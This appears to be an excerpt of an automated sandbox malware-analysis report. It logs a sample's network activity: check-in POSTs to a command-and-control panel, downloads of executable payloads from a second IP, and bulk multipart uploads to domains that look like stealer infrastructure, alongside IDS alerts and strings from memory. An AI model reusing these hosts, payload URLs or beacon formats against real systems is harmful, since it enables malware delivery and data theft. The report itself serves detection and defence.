6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 86 04 00 00 d0 02 00 00 86 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 86 04 00 00 60 07 00 00 86 04 00 00 fa 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016851001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016852001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016853001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016854001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 104.21.23.76 104.21.23.76
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49714 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49725 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49728 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49727 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49736 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49740 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49734 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49732 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49737 -> 172.67.179.109:443
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0GDG4JITE956I1IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12827Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PDMMS71LW4MBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15038Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U6PTUBIO6NB4S8DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20223Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ASEZOCF4S8JVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YGK1W0IT8DWVTIQDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571381Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FZDMAC0SGOOKKBDA2O9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12857Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C14W5ZZHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15020Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0055V99GUATAEDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20223Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RHCMICRUC9ZD1TDEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1252Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K1V74VAR1EBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571367Host: grannyejh.lat
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089E0C0 recv,recv,recv,recv,0_2_0089E0C0
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                          Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                          Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$v
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4001
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpC
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcA
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded1
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxe
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exe
                          Source: skotes.exe, 00000006.00000002.2681819982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe
                          Source: skotes.exe, 00000006.00000002.2681819982.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe/C
                          Source: skotes.exe, 00000006.00000002.2681819982.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe84760(u
                          Source: skotes.exe, 00000006.00000002.2681819982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe=#M
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exe
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
